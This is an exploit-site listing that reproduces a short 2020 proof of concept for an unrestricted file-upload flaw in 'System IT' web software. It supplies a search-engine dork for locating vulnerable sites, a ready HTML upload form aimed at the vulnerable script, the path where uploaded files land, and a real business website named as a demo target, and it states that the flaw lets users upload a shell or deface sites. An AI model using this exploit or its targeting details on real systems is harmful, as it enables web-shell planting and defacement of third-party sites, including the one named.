Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
N/A | CWE-434 | $1000 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2020-07-27 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 0.7 | 0.85 |
# Title: System IT Remote File Upload Vulnerability # Author: h4shur # date: 2020-07-27 # Vendor Homepage: systemit.com.au # Tested on: Windows 10 & Google Chrome # Category : Web Application Bugs # Dork : intext:"Powered by System IT" ### NOTE: * You can bypass it to upload your shell or deface. * ### POC: * Exploit 1 : site.com/fileupload.php <h2>Upload Your File</h2> <form action="site.com/php_sendmail_upload2.php" method="post" name="form1" id="emailForm" enctype="multipart/form-data"> <input class="inputbox" name="fileToUpload" type="file"> <input type="submit" name="Submit" value="Send"> </form> ### Directory File Path : * site.com/upload/[FILE] ### Demo: * http://www.clickprint.com.au/fileupload.php ### Contact Me : * Telegram : @h4shur * Email : [email protected] * Instagram : @netedit0r * twitter : @h4shur
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.